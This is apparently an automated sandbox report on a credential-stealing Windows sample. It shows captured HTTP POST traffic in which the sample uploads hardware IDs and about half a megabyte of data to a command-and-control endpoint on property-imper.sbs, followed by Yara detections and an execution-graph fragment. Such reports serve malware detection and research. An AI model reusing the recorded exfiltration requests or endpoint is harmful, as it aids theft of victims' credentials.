                                                                                            2024-11-24 11:49:21 UTC15331OUTData Raw: 2d 2d 52 53 54 46 57 4e 42 4d 31 32 30 51 44 50 34 31 4e 57 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 46 32 45 38 36 37 39 46 37 30 37 36 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 52 53 54 46 57 4e 42 4d 31 32 30 51 44 50 34 31 4e 57 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 53 54 46 57 4e 42 4d 31 32 30 51 44 50 34 31 4e 57 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                            Data Ascii: --RSTFWNBM120QDP41NWIContent-Disposition: form-data; name="hwid"6AF2E8679F70768FD7CBBD6DF28D3732--RSTFWNBM120QDP41NWIContent-Disposition: form-data; name="pid"3--RSTFWNBM120QDP41NWIContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                            2024-11-24 11:49:21 UTC4644OUTData Raw: a5 31 16 55 bb 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee
                                                                                            Data Ascii: 1U2+?2+?2+?o?Mp5
                                                                                            2024-11-24 11:49:22 UTC1022INHTTP/1.1 200 OK
                                                                                            Date: Sun, 24 Nov 2024 11:49:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=2a0d18nsgu714o7b30mkm28cbt; expires=Thu, 20-Mar-2025 05:36:01 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SXEdAy04CaYaq7eaCs2GLmErY2Ggvf35QFsGfSwd7JjqRMfGcWmvPrzZs%2Br9y4P%2BpgScVAEba1HUqRBrD6Kw4gy3Alnc%2FoIaanX%2B8%2FJNTc3C2GLvFkofHvHKrI2uOoO69%2BsGcmM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e792cdc9c700f8d-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1594&sent=11&recv=23&lost=0&retrans=1&sent_bytes=4232&recv_bytes=20940&delivery_rate=434136&cwnd=177&unsent_bytes=0&cid=d533f594da1a8047&ts=898&x=0"
                                                                                            2024-11-24 11:49:22 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                            Data Ascii: eok 8.46.123.75
                                                                                            2024-11-24 11:49:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.649724172.67.162.844434416C:\Users\user\Desktop\file.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-24 11:49:24 UTC281OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=Z5FUY5BD5MYRERE7
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 1214
                                                                                            Host: property-imper.sbs
                                                                                            2024-11-24 11:49:24 UTC1214OUTData Raw: 2d 2d 5a 35 46 55 59 35 42 44 35 4d 59 52 45 52 45 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 46 32 45 38 36 37 39 46 37 30 37 36 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 5a 35 46 55 59 35 42 44 35 4d 59 52 45 52 45 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 35 46 55 59 35 42 44 35 4d 59 52 45 52 45 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                            Data Ascii: --Z5FUY5BD5MYRERE7Content-Disposition: form-data; name="hwid"6AF2E8679F70768FD7CBBD6DF28D3732--Z5FUY5BD5MYRERE7Content-Disposition: form-data; name="pid"1--Z5FUY5BD5MYRERE7Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                            2024-11-24 11:49:25 UTC1016INHTTP/1.1 200 OK
                                                                                            Date: Sun, 24 Nov 2024 11:49:25 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=hvcjt9qepbo7ps8t1mv6ms0o2f; expires=Thu, 20-Mar-2025 05:36:03 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1GVlxe5zG8r9Uw%2Bit5jnuL%2FJ6DkaqmpXJzWuGzzTYtJoE6g6Va1706HRg5RLFrU0J1ahboZH%2FfTnZ02ypyMAXIUVV2gEXVrkLIYsfacKy9Z7lTYeov00nBv2LgXQzW8PiDc%2BoYM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e792ced8bd8de97-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1453&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2131&delivery_rate=1932495&cwnd=216&unsent_bytes=0&cid=5853cbee64b2271c&ts=710&x=0"
                                                                                            2024-11-24 11:49:25 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                            Data Ascii: eok 8.46.123.75
                                                                                            2024-11-24 11:49:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.649733172.67.162.844434416C:\Users\user\Desktop\file.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-24 11:49:27 UTC284OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=Z3HINSN1XVJ6WEEBH
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 551754
                                                                                            Host: property-imper.sbs
                                                                                            2024-11-24 11:49:27 UTC15331OUTData Raw: 2d 2d 5a 33 48 49 4e 53 4e 31 58 56 4a 36 57 45 45 42 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 46 32 45 38 36 37 39 46 37 30 37 36 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 5a 33 48 49 4e 53 4e 31 58 56 4a 36 57 45 45 42 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 33 48 49 4e 53 4e 31 58 56 4a 36 57 45 45 42 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                            Data Ascii: --Z3HINSN1XVJ6WEEBHContent-Disposition: form-data; name="hwid"6AF2E8679F70768FD7CBBD6DF28D3732--Z3HINSN1XVJ6WEEBHContent-Disposition: form-data; name="pid"1--Z3HINSN1XVJ6WEEBHContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                            2024-11-24 11:49:27 UTC15331OUTData Raw: 47 92 00 39 90 6b 63 6a f2 65 f2 0d cb 85 05 f4 2b 74 4c a6 95 29 24 db a6 b1 ef ac 04 c2 d0 79 58 6b cf 72 0d 1b 23 1f b7 0f 48 a6 fd aa 74 1b ae 14 fc f4 16 19 e1 b2 21 62 02 f7 d3 ec 5c 8e 67 d4 9f ac 58 f3 fd b1 a9 d2 0d 96 73 3a cd 14 bf a4 b0 4b bf 78 9b 54 5b 25 b4 17 c0 8d 89 de 84 29 03 29 c1 ab 51 cd d5 9a 88 99 c2 46 68 f3 12 98 45 6e 8d 46 11 3b 5b 1b 84 d5 4f ba 24 65 16 4d fb 65 8d fa 52 ea 1e ae 9c fc 7c 02 24 a7 87 71 a9 cf 41 df b3 22 dd 06 19 f7 c0 02 57 7d ac 1a 7d 56 12 7c 67 97 72 fe 9d 63 ad 5b e9 81 57 bc 4b 7a 65 e0 35 ff a6 62 23 2c 7f 9a 6f 53 53 1e dd a5 05 d7 06 ec 8b 86 18 68 d6 4c 52 ad ce 08 21 df 0e 6c fe 46 99 92 c0 b3 f9 0b 17 d8 cf c7 3a 27 0c 34 bf 29 d7 b3 51 8d db 11 f3 3f cb a6 bc 54 52 4a 69 95 9f 2d db c1 52 68 77
                                                                                            Data Ascii: G9kcje+tL)$yXkr#Ht!b\gXs:KxT[%))QFhEnF;[O$eMeR|$qA"W}}V|grc[WKze5b#,oSShLR!lF:'4)Q?TRJi-Rhw
                                                                                            2024-11-24 11:49:27 UTC15331OUTData Raw: 7a e2 3d 06 c2 f2 1f 28 a6 8f 78 b0 f8 64 b4 a4 13 96 e2 96 6d 9b 82 7f 2a 67 83 6f cd 3e d8 89 4f 7d a1 ae 8f 55 1d a1 15 1b ce 96 0c 0d 6a 7d e1 79 52 81 38 10 12 33 fd fd 6b 96 07 70 28 b0 8f 88 e8 23 9e 35 96 f0 10 68 4a a1 62 1e 6e 07 07 09 2e 8c 31 3f ce 85 7d 92 e3 d9 76 cb fd 66 a7 0d 8d 88 bd 72 20 14 62 25 95 df 58 68 1b 32 5e c4 12 15 83 63 34 5a f7 c8 5c 02 16 6f 76 7c e7 0f 4f eb 77 7f 30 6e af dd 30 9a 2e ee b6 7d 6e eb f1 55 63 ba 96 d5 52 fb c6 67 48 43 85 46 c6 c2 dd 83 2c 95 69 46 5e 95 76 35 bd 3e fa 7b 5e d0 bc f3 f4 53 c7 b4 a7 c1 23 d2 e2 6f ac 6c 7d ad b6 6b 6d b6 ae 23 28 a3 b4 c6 4f e2 8e fb de c4 90 da e3 c0 cc 80 62 84 1b 86 01 71 ed 44 a9 ee 73 7d f6 e6 6b 49 d6 2a 58 d2 c5 2d 0c dd 46 83 61 49 00 02 03 fe 05 34 c1 c9 34 0d 7b
                                                                                            Data Ascii: z=(xdm*go>O}Uj}yR83kp(#5hJbn.1?}vfr b%Xh2^c4Z\ov|Ow0n0.}nUcRgHCF,iF^v5>{^S#ol}km#(ObqDs}kI*X-FaI44{
                                                                                            2024-11-24 11:49:27 UTC15331OUTData Raw: f3 01 61 d4 55 e0 76 e7 f7 ee df ff ff c3 cd 13 40 be 38 5e f3 27 44 c9 d2 4b 45 42 19 42 cc 5b 69 20 d1 df ff d6 bd 2c c4 a1 48 64 cf 25 c5 61 f5 6f 80 b0 97 68 89 79 89 25 7e 99 94 5b e0 06 67 7e 42 4b 5e bb 84 e2 ca b9 a1 1d 22 ac 1f 41 6d 30 d2 13 03 94 fb 4e cc 4d 15 59 ea cd 25 15 ad 22 d1 39 7e f9 65 38 c9 d0 60 e1 1b de ad 54 80 b6 0f 63 dd ff 1d 15 e3 cc cb 9c da c8 3c 9c ff 7a bd bb 15 b8 78 be 95 00 e1 45 a7 c2 97 da f3 7e 65 dc bb d1 c6 b6 ed 14 b0 ed f7 64 cb f6 a4 08 19 27 1b 4d 45 3a 1b 92 64 b2 e4 8b 4a 00 ab 2c f2 a2 2f 6e d3 48 68 61 ba 7c 41 51 e2 94 8c 85 4d 88 27 cf a1 9c 96 09 90 8b cf 8f 47 f0 1b c7 92 66 b7 4f bf d9 c7 a9 45 95 b6 7b 82 67 b4 af 8d d9 b9 41 89 dd 3e 04 6e 3c 57 95 09 57 1a a1 9f d5 d7 44 65 2d 16 1f a2 95 4b b0 14
                                                                                            Data Ascii: aUv@8^'DKEBB[i ,Hd%aohy%~[g~BK^"Am0NMY%"9~e8`Tc<zxE~ed'ME:dJ,/nHha|AQM'GfOE{gA>n<WWDe-K
                                                                                            2024-11-24 11:49:27 UTC15331OUTData Raw: 16 d2 b6 e3 98 51 c1 37 4e 64 e1 82 2b 6a 65 08 b1 59 b8 98 32 7a dd 67 d2 b1 b1 a5 cb 10 21 e7 1d 3a 6d 5e ba d6 1a 4f 72 87 0d 6a 32 a7 a3 1f d5 21 21 9f 87 67 6e 90 48 ad d7 e6 23 27 7b 25 b4 48 36 24 7a 72 8a 08 5b a4 f6 ec 02 26 e0 b5 7f 04 75 7a cf ec 43 2d 61 53 83 b5 de 9b 82 9b 3b ad bb c7 3b 9d 3b f4 12 41 b0 55 2a cc 56 e6 36 7c 43 24 97 1c 1b b2 70 88 38 da e2 d0 b8 1b 44 e9 4b b5 6e ed 54 9b 53 40 2c eb 42 7f 62 ff f4 4b 1d f0 a3 b7 21 46 95 f3 5e 46 a9 29 36 e1 99 ea a2 2f 4f 72 6c 16 ed 5b a4 3e 93 d4 ae cf fe fc a7 90 9a f1 12 b5 66 fd ae e3 86 65 4a a9 68 7a 7b 43 09 ef 7c 1a 75 ea 8a 5d e2 bc 1f af 21 6f af 54 a0 75 40 24 65 99 b8 ea 55 a2 bf 3d 71 f9 0a ef de d5 aa 81 e0 81 b3 33 b0 df 9d fe 12 8e 79 4e d5 84 f0 14 8c 28 81 7b 93 84 34
                                                                                            Data Ascii: Q7Nd+jeY2zg!:m^Orj2!!gnH#'{%H6$zr[&uzC-aS;;;AU*V6|C$p8DKnTS@,BbK!F^F)6/Orl[>feJhz{C|u]!oTu@$eU=q3yN({4
                                                                                            2024-11-24 11:49:27 UTC15331OUTData Raw: 16 04 ae 48 a0 f2 70 07 68 62 53 0d 35 5b 55 d3 c9 04 e9 b8 4e 3a da ca c7 5e 98 4c 61 dd e9 85 86 2c 12 71 3a ee c1 d1 1b 37 7a 11 80 74 55 eb de 10 e5 98 2a 71 b2 84 4d 61 b6 32 c1 a1 40 16 6c 1d 18 8e 81 72 05 c0 97 ec ae a2 d5 74 48 df 19 b0 c4 49 49 68 54 6e 5a 23 88 95 17 05 f2 7f 5e e2 e4 81 2c 33 f6 c9 cf d8 29 1c 6c d6 8e 03 f9 fa a8 e8 64 2b 03 87 52 a1 c0 a1 88 dc 34 be 68 e4 30 1a 33 6b 5d 43 9b 23 2d d8 c2 8d 3c c4 4e c0 c6 76 1e f8 98 af 51 ed 72 16 79 41 00 fe 65 99 5b 9b 5c 75 89 53 f2 11 7b 9a 2e 2c 76 59 20 e6 fb e8 ce 99 cb cf 2c e5 7b 2f 4c d9 a3 63 79 33 9a a6 d4 4c 59 fd 74 0d cc 7f 5e ab 7b 6f 02 1f fb 01 d1 e4 56 50 37 5b d7 78 cd 65 10 ef 8e 85 37 b2 fb ee b9 1f 18 95 83 23 15 49 67 00 32 c1 2b 2e 06 72 b9 57 fd c6 c6 3e 90 ae 12
                                                                                            Data Ascii: HphbS5[UN:^La,q:7ztU*qMa2@lrtHIIhTnZ#^,3)ld+R4h03k]C#-<NvQryAe[\uS{.,vY ,{/Lcy3LYt^{oVP7[xe7#Ig2+.rW>
                                                                                            2024-11-24 11:49:27 UTC15331OUTData Raw: 20 9a ed 48 9f f0 36 de cd 21 7d c6 20 3b 7d a4 b4 95 97 61 e8 bf 10 b7 be 38 a2 b0 cd 72 c3 bf bc b8 c4 d8 a6 ac 53 2c bc 82 9a fe 9c 59 29 ca 7d 35 99 44 91 d2 d6 f8 25 aa 5d 90 c0 89 ee fa 36 6f 6c 19 6c 29 08 d6 e6 6a b6 1a bc b2 dc d2 aa 4c 42 29 42 c0 49 4a db 76 f1 03 84 83 e8 3d ff b7 22 34 7c c7 af 2b fc f4 a1 2e 59 a3 fc aa f5 1d c7 4a dd ce 4f 08 2c 6c 15 62 42 ac 89 9b 0d 64 5d 3c b6 08 de a9 3c 67 8a 8b 8c d1 bc 46 24 36 b5 32 ee c1 7e b7 38 d0 fe bf b5 82 b2 12 28 ee fb 44 a3 80 31 5a 15 a2 06 9e a1 bb c0 09 91 54 be ed 6f 63 b4 14 de e4 fd 48 ca e3 29 fc e8 6b ac 4d 66 fa 53 78 38 04 72 f2 f1 5f 44 58 25 80 f1 83 f1 6d 90 1c f8 46 81 0f b1 16 57 3d f5 80 f0 83 59 20 66 4f 2d 69 36 b7 22 04 9f 2f 8b 46 17 72 65 2e c4 0d a8 a7 61 19 04 84 5b
                                                                                            Data Ascii: H6!} ;}a8rS,Y)}5D%]6oll)jLB)BIJv="4|+.YJO,lbBd]<<gF$62~8(D1ZTocH)kMfSx8r_DX%mFW=Y fO-i6"/Fre.a[
                                                                                            2024-11-24 11:49:27 UTC15331OUTData Raw: f9 0f 6c 6c 18 92 82 17 a3 b9 4e cd b1 08 b5 3d e7 23 b7 c3 b7 17 83 b1 63 d5 ba 91 41 68 86 28 43 78 a2 c4 26 c1 67 db 8e 99 f9 a1 fa ae f3 14 dc 4c 15 f5 8f 90 d9 ae a1 5b 2f ec 0a 0d d8 79 e6 d8 20 2e 6a 58 f4 f7 eb 48 6c 13 8f c3 7a 25 84 eb ee 63 a4 89 07 83 1f d0 c2 a1 31 ab 64 6e c3 14 19 2e 0e c6 1c 17 de c5 62 19 cc e7 7c f3 a2 7f 0f e4 c1 a7 73 6b 38 ef 45 96 b2 ec 13 a9 1a ba 4a 89 de 74 59 9b af 06 dc 12 df 5b b2 c2 12 15 7a 1f db de b6 5a e4 c3 e9 fe e2 26 17 79 77 12 f7 73 c3 e7 e6 e2 46 f4 52 9b bc 42 75 ed 76 d1 b6 d7 49 e2 c7 03 ea f8 48 2a f0 8f 08 56 e5 55 7c 2d c3 e8 10 b1 a5 99 34 46 69 57 e6 12 0b f8 70 fd 17 5d 0c fd 49 37 21 1c 55 c6 c1 3f db d9 29 06 2b 64 6b 64 29 99 43 d4 cc 75 6a 9b 78 8d 0f da 07 88 88 40 17 71 f9 c8 29 a5 f6
                                                                                            Data Ascii: llN=#cAh(Cx&gL[/y .jXHlz%c1dn.b|sk8EJtY[zZ&ywsFRBuvIH*VU|-4FiWp]I7!U?)+dkd)Cujx@q)
                                                                                            2024-11-24 11:49:27 UTC15331OUTData Raw: a7 97 d1 25 99 97 94 58 98 94 d4 ba 3f 26 ea a6 7e 64 e5 99 d3 54 a1 ff b8 c4 49 08 cd 97 91 b5 42 d1 cb 63 03 4a 63 fd 0f 4e 3a ba c0 8b ce 2a 91 53 8d 14 73 97 62 75 d7 68 f5 e1 d6 ad 17 bc a0 71 55 cb de ed 72 91 7b df 13 19 e9 56 16 0f 22 46 ab ee ef 8f 5c c9 23 dc e9 db d8 53 1b 54 6d b3 07 d3 af 6e 8f 27 25 b2 f1 35 e6 0c 22 97 04 93 f3 20 f1 63 ca 2a 25 fb 34 52 d5 72 9a 2c c5 44 44 96 76 6d 6b 74 da a1 16 ad 2d df ba 44 d5 6a 54 49 48 6a b6 22 d7 50 58 64 79 fa a8 38 25 08 2d 94 34 e2 e3 4a e5 a2 22 13 b8 55 df 1d f1 07 bd 44 b7 f1 84 34 26 6d 7b 0e 4b 3f ed a6 7d a2 f2 cf b5 e4 03 70 a8 28 4f 56 7a 4e 69 64 c1 2d 34 a2 03 0d 2f 75 ff a7 f4 8c c1 16 5d e6 e7 bd 37 46 74 41 aa 12 c1 e8 ff 6d 00 5b b7 66 f5 ca 81 f6 07 95 27 fe b9 a4 22 b9 49 f3 85
                                                                                            Data Ascii: %X?&~dTIBcJcN:*SsbuhqUr{V"F\#STmn'%5" c*%4Rr,DDvmkt-DjTIHj"PXdy8%-4J"UD4&m{K?}p(OVzNid-4/u]7FtAm[f'"I
                                                                                            2024-11-24 11:49:27 UTC15331OUTData Raw: d2 4b 27 b0 85 38 99 b6 ee 8c cb 79 5d 2d ba fc a7 15 3b 5b 8a ed da 96 4c 22 ac d1 b0 56 1a 27 27 fb 5d 25 6e 55 a6 f4 8e 64 a5 a3 61 54 38 ea 5a 34 5d 96 1b 98 26 ac c3 d1 df be 66 7f 2b a3 07 82 33 e1 bc 41 a6 68 92 7e 23 f4 cc ba 65 a6 b5 1a db af 9e 84 a7 16 6e fa a5 b2 6f d9 11 58 e3 b7 24 76 a9 ca 52 d8 ad ef b1 6c ec 2d b5 00 1b 38 02 15 89 82 95 bf 6c ca 39 4e ba a0 16 e6 30 f0 33 75 3e b1 ef 7b 86 17 34 60 74 c3 7a 03 e1 04 68 78 08 ef db 75 f5 6e 6e ed 7a 30 fb af 4d 0d 9f 8c f4 35 32 d3 24 6c 1b 1c 4d d9 f5 df 94 fb aa 9d c3 ee 02 fb e7 ba e4 48 cb 6e 44 ea af 79 58 02 d1 79 bc 25 2e b4 c6 32 df c5 09 07 0d 3b 63 49 6e 0c 38 7c cf c1 c6 45 91 8e fe af 2f 95 52 b8 da f8 37 3b a8 69 4a 29 ff 5a 6d 1b a8 0c e4 8f 99 67 ba 85 f7 f9 20 5b 6a cb d0
                                                                                            Data Ascii: K'8y]-;[L"V'']%nUdaT8Z4]&f+3Ah~#enoX$vRl-8l9N03u>{4`tzhxunnz0M52$lMHnDyXy%.2;cIn8|E/R7;iJ)Zmg [j
                                                                                            2024-11-24 11:49:30 UTC1052INHTTP/1.1 200 OK
                                                                                            Date: Sun, 24 Nov 2024 11:49:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=78u9bjjgoti0ngp6ms2drpf7pj; expires=Thu, 20-Mar-2025 05:36:07 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zG18lif%2Fbv0gzlUamoMLZLuXzgL9Pwj8nB53jEkeZnFCkVldlM6%2BsJF70EiHGYwTaR0xZ%2Ba4%2FPp8D3X%2Bzwxt0h45PUfRBxnhxr0WO2acEQHf50uoZAzXjDi3ugrYaZ7zC5%2FoKEo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e792cfd2b4cc459-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1471&min_rtt=1463&rtt_var=566&sent=317&recv=572&lost=0&retrans=0&sent_bytes=2845&recv_bytes=554236&delivery_rate=1906005&cwnd=231&unsent_bytes=0&cid=80dde61cab7387f2&ts=3849&x=0"


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:06:49:08
                                                                                            Start date:24/11/2024
                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                            Imagebase:0xb20000
                                                                                            File size:1'872'384 bytes
                                                                                            MD5 hash:6F817D33D580EB1B17C7159CD9E48C6E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2272712879.000000000120C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2248717163.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2248717163.000000000120C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2276959339.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2272712879.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2226439484.000000000120C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2203966903.000000000120C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:10.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:67.4%
                                                                                              Total number of Nodes:239
                                                                                              Total number of Limit Nodes:15
                                                                                              execution_graph 7015 b2def2 7016 b2df20 7015->7016 7016->7016 7017 b2df9e 7016->7017 7019 b5df70 LdrInitializeThunk 7016->7019 7019->7017 6735 b2dc33 6737 b2dcd0 6735->6737 6736 b2dd4e 6737->6736 6739 b5df70 LdrInitializeThunk 6737->6739 6739->6736 6740 b2ceb3 CoInitializeSecurity 7010 b2e970 7011 b2e8b8 7010->7011 7013 b2e948 7011->7013 7014 b5df70 LdrInitializeThunk 7011->7014 7013->7013 7014->7013 7007 b39130 7008 b5b8e0 2 API calls 7007->7008 7009 b39158 7008->7009 7046 b3db30 7047 b3db70 7046->7047 7048 b2b210 2 API calls 7047->7048 7049 b3dda8 7048->7049 6741 b2e35b 6742 b2e361 6741->6742 6743 b2e370 CoUninitialize 6742->6743 6744 b2e3a0 6743->6744 6745 b2e0d8 6746 b2e100 6745->6746 6748 b2e16e 6746->6748 6802 b5df70 LdrInitializeThunk 6746->6802 6750 b2e22e 6748->6750 6803 b5df70 LdrInitializeThunk 6748->6803 6761 b45e90 6750->6761 6752 b2e29d 6769 b46190 6752->6769 6754 b2e2bd 6779 b47e20 6754->6779 6758 b2e2e6 6799 b48c90 6758->6799 